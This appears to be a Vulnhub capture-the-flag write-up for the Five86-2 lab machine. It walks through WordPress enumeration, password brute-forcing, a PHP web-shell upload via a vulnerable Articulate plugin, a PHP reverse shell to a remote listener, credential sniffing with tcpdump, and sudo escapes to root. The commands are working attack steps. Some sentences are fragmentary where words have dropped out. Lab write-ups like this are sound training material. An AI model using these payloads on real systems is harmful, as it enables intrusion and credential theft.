Vulnhub - Five86 writeup
We see that there is only two open port. We’ll start our enumeration with the HTTP service.
Since we can see that the website is supposed to be running wordpress we’ll just add the
IP to our
I then ran
wpscan on that website
➜ wpscan -e u,ap --no-banner --wp-content-dir wp-content/ --url http://five86-2/
Since I had 5 user names I decided to do dictionary attack on those accounts so I made a list named
users.txt having all the usernames and used rockyou for password list.
stephen account I was able to login into FTP service. I enumerated lots of file using FTP but none of them lead me to anything. So I decided to login as
stephen in WP but again there was nothing interesting. But when we login as
barney in WP we see that there are some plugins allowed.
If you notice one thing is that only one of them was active so I looked around for any exploit and actually found one WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution, the only issue in that exploit is that in the end it ask you to visit
wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami but it should be
wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami notice the
wp-content in place of
wp-admin other than that everything should be same.
echo "<html>hello</html>" > index.html echo "<?php echo system($_GET['cmd']); ?>" > index.php zip poc.zip index.html index.php
Then upload the zip file and visit
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami and you should have the RCE.
Now we can use this exploit to get a reverse shell. I tried to run
nc shell command but it didn’t worked so I used the following PHP command:
php -r '$sock=fsockopen("192.168.56.1",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
Since I have two username and password I tried to
su into those account and I was succesfully able to change to
I then ran my enumeration script and found out that there was a
suid present but it can only be run by
peter. Now after looking around for a while I noticed that
stephen was in
And then in the output of my
enumeration script I saw that
tcpdump had some
So I decided to run
tcpdump on the
lo interface and just see what I could catch.
timeout 300 tcpdump -i lo -w hack.pcap
And then used
FTP to download the file easily to my system to analyze it.
In that file I saw that there was some
FTP protocol and it had the name of
paul so I read that packet conversation and found the password for
We are paul but we need to become peter so I again looked around and found out that
paul is allowed to run
peter because of
gtfo to search gtfobins for this
service and found a way we can spawn a shell using it:
We can run
sudo -u peter service ../../bin/sh
And then I noticed that
peter have sudo rights too, he was allowed to run
So I used that to change the password of
And then got the root shell and root flag.
Really enjoyed this one, looks like we’ll be getting another awesome series from @DCAU7.
Thanks to @Five86_x for letting me beta test this.
Thanks for reading, Feedback is always appreciated.